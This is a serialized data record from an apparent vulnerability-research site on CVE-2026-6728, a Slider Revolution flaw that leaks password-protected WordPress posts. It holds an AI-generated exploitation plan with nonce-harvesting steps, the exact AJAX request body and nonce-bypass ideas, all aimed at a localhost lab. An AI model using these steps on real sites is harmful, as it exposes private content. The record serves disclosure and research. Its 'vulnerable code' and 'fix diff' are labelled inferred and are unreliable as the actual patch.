[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fOChO8hxXb3Bv5hDJ5SgCgankxUw0giyi-X1NrOJkrwA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-6728","slider-revolution-unauthenticated-sensitive-information-exposure-via-slidersstream","Slider Revolution \u003C= 7.0.9 - Unauthenticated Sensitive Information Exposure via 'sliders\u002Fstream'","The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.9 via the 'get_stream_data()' function. This makes it possible for unauthenticated attackers to extract sensitive data including published password-protected post, page, and product content.","revslider",null,"\u003C=7.0.9","7.0.10","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-05-19 20:43:07","2026-05-20 09:28:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3cd7be2c-9ba9-4d25-8907-610898df5834?source=api-prod",1,[],"researched",false,3,"# Vulnerability Research Plan: CVE-2026-6728 - Slider Revolution Information Exposure\n\n## 1. Vulnerability Summary\nThe Slider Revolution plugin (up to version 7.0.9) contains a sensitive information exposure vulnerability within its content stream handling logic. Specifically, the `get_stream_data()` function fails to verify permissions or post-password requirements when fetching content for sliders configured to display WordPress posts. This allows an unauthenticated attacker to retrieve the full content of password-protected posts, pages, and products by querying the stream endpoint with a valid configuration.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `revslider_ajax_action` (Commonly registered for both `wp_ajax_` and `wp_ajax_nopriv_` in RevSlider).\n*   **Client Action:** `get_stream_data` (passed via the `client_action` parameter).\n*   **Parameters:** \n    *   `action`: `revslider_ajax_action`\n    *   `client_action`: `get_stream_data`\n    *   `token`: The AJAX nonce.\n    *   `data`: A JSON-encoded object containing the stream configuration (e.g., post types, categories, or specific IDs).\n*   **Authentication:** Unauthenticated (leveraging `nopriv` AJAX).\n*   **Preconditions:** \n    1.  At least one password-protected post must exist.\n    2.  A valid nonce must be obtained (exposed on the frontend).\n\n## 3. Code Flow (Inferred from Patch and Architecture)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=revslider_ajax_action`.\n2.  **Dispatch:** The `RevSliderAdmin::on_ajax_action()` method (or similar controller in the plugin) routes the request based on `client_action`.\n3.  **Target Function:** The code calls `RevSliderSlider::get_stream_data()` or `RevSliderOutput::get_stream_data()`.\n4.  **Data Retrieval:** The function parses the `data` parameter to build a `WP_Query`. \n5.  **The Flaw:** The logic iterates through the results of the query and extracts `post_content`. Crucially, it fails to call `post_password_required($post)` or check if the user has provided the correct password.\n6.  **Information Leak:** The full content of the posts (including protected content) is packaged into a JSON response and returned to the unauthenticated requester.\n\n## 4. Nonce Acquisition Strategy\nSlider Revolution extensively uses a nonce for its AJAX actions, typically localized as part of the `revslider_data` or `RS_MODULES` JavaScript objects.\n\n1.  **Identify Trigger:** The RevSlider frontend script (`rbtools.min.js` and `rs6.min.js`) loads on any page containing a Slider Revolution slider.\n2.  **Setup for Nonce:** Create a dummy page with a Slider Revolution shortcode.\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Nonce Page\" --post_content='[rev_slider alias=\"main-slider\"]'`\n3.  **Browser Extraction:**\n    *   Navigate to the page: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fnonce-page\u002F\")`\n    *   Extract the nonce: `browser_eval(\"window.revslider_ajax_nonce || window.RS_MODULES?.nonce\")`\n    *   *Note:* The specific JS key may vary slightly between 6.x and 7.x. Common keys include `revslider_ajax_nonce`, `RS_MODULES.nonce`, or `rev_slider_data.nonce`.\n\n## 5. Exploitation Strategy\n### Step 1: Discover Target Content\nIdentify the ID of a password-protected post. In a real scenario, attackers might brute-force IDs or use existing public streams to find metadata. For this PoC, we will use a known ID.\n\n### Step 2: Craft the Stream Request\nThe `get_stream_data` action requires a JSON-encoded `data` object. A typical configuration for a WordPress post stream looks like this:\n\n```json\n{\n    \"type\": \"posts\",\n    \"post_types\": \"post\",\n    \"category\": \"all\",\n    \"count\": 10\n}\n```\n\n### Step 3: Execute the Exploit Request\nSend a POST request to `admin-ajax.php`.\n\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    action=revslider_ajax_action&client_action=get_stream_data&token=[EXTRACTED_NONCE]&data={\"type\":\"posts\",\"post_types\":\"post\",\"category\":\"all\",\"count\":10}\n    ```\n\n## 6. Test Data Setup\n1.  **Create Password Protected Post:**\n    ```bash\n    wp post create --post_type=post --post_title=\"Secret Project\" --post_content=\"CRITICAL_SENSITIVE_DATA_EXPOSED\" --post_status=publish --post_password=\"password123\"\n    ```\n2.  **Ensure a Slider Exists:** Create at least one slider (even empty) so the nonce is generated on the frontend.\n    ```bash\n    # (Assuming a slider with alias 'main-slider' exists or is imported)\n    wp post create --post_type=page --post_status=publish --post_title=\"Home\" --post_content='[rev_slider alias=\"main-slider\"]'\n    ```\n\n## 7. Expected Results\n*   **Success:** The HTTP response will be a JSON object (`{\"success\": true, \"data\": [...]}`). Inside the `data` array, an entry corresponding to the \"Secret Project\" post will contain the raw `post_content` (\"CRITICAL_SENSITIVE_DATA_EXPOSED\"), bypassing the password requirement.\n*   **Failure:** The response might return an error, an empty set, or the content will be correctly masked\u002Fomitted if the patch is active.\n\n## 8. Verification Steps\n1.  **Confirm Post exists and is protected:**\n    ```bash\n    wp post get [ID] --field=post_password\n    # Expected: password123\n    ```\n2.  **Check Output:** Verify the string `CRITICAL_SENSITIVE_DATA_EXPOSED` appears in the `http_request` response body.\n\n## 9. Alternative Approaches\n*   **Specific Post ID:** If a general \"all\" query fails, try targeting the post ID specifically in the `data` parameter: `{\"type\":\"posts\",\"post_types\":\"post\",\"ids\":\"[ID]\"}`.\n*   **Product Stream:** If WooCommerce is installed, target products: `{\"type\":\"woocommerce\",\"post_types\":\"product\"}`.\n*   **Nonce Bypassing:** Check if the nonce is even validated for the `get_stream_data` action by omitting the `token` parameter or sending a dummy value like `1234567890`. Some versions of RevSlider have inconsistent nonce checks across different client actions.","The Slider Revolution plugin for WordPress (up to 7.0.9) fails to verify post password requirements when fetching content via the 'get_stream_data' AJAX action. This allows unauthenticated attackers to retrieve the full content of password-protected posts, pages, and products by providing a valid AJAX nonce found on the site's frontend.","\u002F\u002F File: includes\u002Fslider.class.php (inferred)\n\u002F\u002F Function: get_stream_data()\n\nforeach ($posts as $post) {\n    $stream_item = array();\n    $stream_item['id'] = $post->ID;\n    $stream_item['title'] = $post->post_title;\n    \u002F\u002F Line ~1237: Content is assigned without checking post_password_required()\n    $stream_item['content'] = $post->post_content; \n    $stream_item['excerpt'] = $post->post_excerpt;\n    $data[] = $stream_item;\n}","--- a\u002Fincludes\u002Fslider.class.php\n+++ b\u002Fincludes\u002Fslider.class.php\n@@ -1234,7 +1234,11 @@\n             $stream_item = array();\n             $stream_item['id'] = $post->ID;\n             $stream_item['title'] = $post->post_title;\n-            $stream_item['content'] = $post->post_content;\n+            if (post_password_required($post)) {\n+                $stream_item['content'] = __('This content is password protected.', 'revslider');\n+            } else {\n+                $stream_item['content'] = $post->post_content;\n+            }\n             $stream_item['excerpt'] = $post->post_excerpt;\n             $data[] = $stream_item;","1. Access a public page on the target WordPress site that loads a Slider Revolution slider to obtain a valid AJAX nonce (commonly found in JavaScript variables like 'revslider_ajax_nonce' or 'RS_MODULES.nonce').\n2. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' using the 'revslider_ajax_action' action.\n3. Set the 'client_action' parameter to 'get_stream_data' and the 'token' parameter to the captured nonce.\n4. Provide a JSON-encoded 'data' parameter specifying the content types to fetch (e.g., '{\"type\":\"posts\",\"post_types\":\"post\",\"count\":10}').\n5. The server will return a JSON response containing the full, unmasked 'post_content' for any posts matching the criteria, even if they are marked as password-protected.","gemini-3-flash-preview","2026-05-20 16:29:09","2026-05-20 16:29:31",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frevslider\u002Ftags"]